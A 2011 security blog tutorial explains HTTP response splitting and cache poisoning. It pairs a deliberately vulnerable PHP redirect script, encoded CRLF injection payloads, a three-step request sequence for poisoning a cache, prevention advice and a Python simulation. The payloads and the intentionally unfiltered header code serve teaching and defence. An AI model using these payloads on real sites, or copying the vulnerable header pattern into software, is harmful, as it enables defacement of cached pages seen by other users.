Wednesday, July 13, 2011

HTTP cache poisoning

HTTP response splitting

First, look at this source code:
$ cat redir.php
<?php
// Deliberately vulnerable: $_GET['page'] is copied into the Location header unfiltered
header ("Location: " . $_GET['page']);
?>

The "page" argument comes from the end user and the script redirects (302) to it. Ex:

redir.php?page=index.php
redir.php?page=test.html

Now look at the HTTP request. Normally, if you request redir.php?page=test.html, the request looks like this:
GET http://localhost/redir.php?page=test.html HTTP/1.1
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

The server answers with a redirect to test.html. Notice the "page" value: it is not filtered, so the end user can put anything in it.
By inserting CR (%0d) and LF (%0a) the attacker ends the Location header early and controls the rest of the HTTP response, so the server sends what the client (or a cache in between) reads as two responses to a single request. How does that work?

The normal page value:
?page=test.html
gives this answer from the vulnerable application:
HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: test.html

The attacker changes it to (a single line; the Content-Length is the 7 bytes of "deface!"):
?page=test.html%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Length:%207%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface!

The resulting answer from the vulnerable application (the injected CR LF pairs have become real line breaks):
HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: test.html
Content-Length: 0

HTTP/1.1 200 OK
Content-Length: 7
Content-Type: text/html

deface!

A web cache in front of the server reads this as two responses. If the attacker pipelines a second request on the same connection, say for test.html, the cache pairs that request with the second response and stores "deface!" as the content of test.html.
From then on, every request for test.html that passes through that cache receives the "deface!" message. Note that the injected Content-Length must match the injected body exactly (7 bytes here); otherwise the cache either reads part of the next message as body or waits for bytes that never arrive.
The headers most often built from user input, and so the usual candidates for this attack, are:
-Location (as in this example)
-Set-Cookie

------------------------------------------------------------------------------------------------------------------------
That is HTTP response splitting. Now we talk about HTTP cache poisoning, which uses response splitting in three steps:
First: evict the target page from the cache
GET http://localhost/index.html HTTP/1.1
Pragma: no-cache
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

Notice the Pragma: no-cache header. Its HTTP/1.1 equivalent, Cache-Control: no-cache, has the same effect: the cache must fetch a fresh copy from the origin instead of serving the stored one, so the old copy of index.html is dropped.

Second: using HTTP response splitting we make the cache see two responses to one request. Here the page value starts with CR LF, so the genuine Location header is left empty and everything after it is attacker-supplied (one line; the Content-Length is the 7 bytes of "deface!"):
GET http://localhost/redir.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202014%2014:50:18%20GMT%0d%0aContent-Length:%207%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

URL-decoding the value shows the headers exactly as the server will emit them:
http://localhost/redir.php?page=
Content-Length: 0

HTTP/1.1 200 OK
Last-Modified: Mon, 27 Oct 2014 14:50:18 GMT
Content-Length: 7
Content-Type: text/html

deface!
Notice the Last-Modified header: it is set to a date in the future, so the cache treats the injected page as newer than anything it already holds and keeps serving it from memory.

Finally: request the page we want to replace in the cache:
GET http://localhost/index.html HTTP/1.1
Host: localhost
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

The cache pairs the second answer from request #2 with request #3 and stores it under index.html. In this way we have replaced the cached content.
That is the theory. Whether it works against a real cache depends on how that cache pairs pipelined responses with requests and on its freshness rules, so it has to be tested against the actual deployment.
Prevent:
Input validation: reject any CR or LF character in a value that ends up in a header. (PHP 5.1.2 and later already refuse a header() value that contains a newline, so the script above is only exploitable on older PHP or in code that writes headers itself.)
Better still: never copy a value from an untrusted source into a header. Map the input onto a fixed set of targets instead.
Ex: index.php?language=en
You can use a switch (the page paths below are placeholders):
<?php
switch ($_GET['language']) {
    case 'en': $target = 'en/index.php'; break;   // English page
    case 'jp': $target = 'jp/index.php'; break;   // Japanese page
    case 'fr': $target = 'fr/index.php'; break;   // French page
    default:   $target = 'en/index.php';          // anything else: default page, never the raw value
}
header('Location: ' . $target);
?>
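As an added example (not code from the original post), here is a Python model of the whole attack: the vulnerable redirect from the top of the post, a Content-Length-framing parser standing in for the cache, the three-step poisoning procedure, and the hardened redirect from the Prevent section. The payload is the post's own injected value with its Content-Length corrected to 7; the URLs /redir.php and /index.html, the simplified response format (status line plus Location only), and the allowlist of index.php/test.html are assumptions of the model. Cache freshness (the Last-Modified trick) is not modelled.

```python
import urllib.parse

# Constructed attacker value for the "page" parameter, as it appears in the URL.
# The web server percent-decodes it before PHP sees $_GET['page'].
PAYLOAD = ("test.html%0d%0aContent-Length:%200%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Length:%207%0d%0a"
           "Content-Type:%20text/html%0d%0a%0d%0adeface!")

ALLOWED_PAGES = ("index.php", "test.html")   # assumption: the two targets the post uses


def server_decodes(query_value):
    """What the web server does to a query parameter before the script runs."""
    return urllib.parse.unquote(query_value)


def vulnerable_redirect(page):
    """Models redir.php: the unfiltered value is copied straight into Location.
    Simplification: only the status line and the Location header are emitted."""
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: " + page + "\r\n\r\n").encode("latin-1")


def hardened_redirect(page):
    """The fix from the Prevent section: refuse CR, LF and NUL and accept only
    known pages; anything else goes to the default page and is never echoed."""
    if any(c in page for c in "\r\n\x00") or page not in ALLOWED_PAGES:
        page = "index.php"
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: " + page + "\r\n\r\n").encode("latin-1")


def parse_responses(stream):
    """Split one byte stream into HTTP responses the way a Content-Length-framing
    proxy does: headers up to the blank line, then exactly Content-Length body
    bytes, then the next message. A response without Content-Length is treated
    as having an empty body (a simplification of the model)."""
    responses, pos = [], 0
    while pos < len(stream):
        if stream.startswith(b"\r\n", pos):      # tolerate stray CRLF between messages
            pos += 2
            continue
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            break                                # incomplete headers: stop reading
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = end + 4
        responses.append({"status": lines[0], "headers": headers,
                          "body": stream[body_start:body_start + length]})
        pos = body_start + length
    return responses


def poison_cache(query_value, redirect=vulnerable_redirect):
    """The three-step procedure. Step 1: Pragma: no-cache evicts the old entry.
    Step 2/3: the attacker pipelines /redir.php and /index.html on one connection;
    the cache pairs the responses it reads back with the requests in order and
    stores any 200 under that URL. In this model only the first request reaches
    the origin, which is the point: its single reply is parsed as two responses."""
    cache = {"/index.html": b"<genuine index.html>"}   # what the cache held before
    cache.pop("/index.html")                            # step 1: eviction
    pipelined = ["/redir.php", "/index.html"]           # steps 2 and 3
    stream = redirect(server_decodes(query_value))
    for url, resp in zip(pipelined, parse_responses(stream)):
        if resp["status"].startswith("HTTP/1.1 200"):
            cache[url] = resp["body"]
    return cache


if __name__ == "__main__":
    print("benign :", poison_cache("test.html"))
    print("attack :", poison_cache(PAYLOAD))
    print("fixed  :", poison_cache(PAYLOAD, redirect=hardened_redirect))
```

Run it and the attack case shows /index.html cached as b'deface!' while the benign and hardened cases leave the cache empty. The stray CRLF the model leaves after "deface!" is the trailing end of the genuine 302, which is why the parser tolerates blank lines between messages; a real attacker pads the injected Content-Length so that nothing is left over.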
References:
https://www.owasp.org/index.php/HTTP_Response_Splitting
https://www.owasp.org/index.php/Cache_Poisoning
https://www.owasp.org/index.php/Cross-User_Defacement
------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.  
